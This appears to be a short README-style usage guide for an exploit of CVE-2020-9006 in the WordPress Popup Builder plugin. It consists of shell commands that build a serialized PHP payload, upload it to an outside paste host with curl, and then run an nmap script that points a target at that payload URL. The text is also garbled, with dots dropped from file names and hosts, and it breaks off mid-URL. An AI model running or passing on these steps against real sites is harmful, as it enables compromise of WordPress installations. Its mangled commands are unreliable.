CVE-2020-9006: Wordpress Popup-Builder Plugin Exploit Usage: # Create and upload payload # Also see: php create-serialized-payloadphp -h $ php create-serialized-payloadphp | curl -F 'sprunge=<-' sprungeus sprungeus/XXXXXX # Run exploit $ nmap --script /cve-2020-9006 --script-args httpuseragent='Mozilla/50',payload-url='http: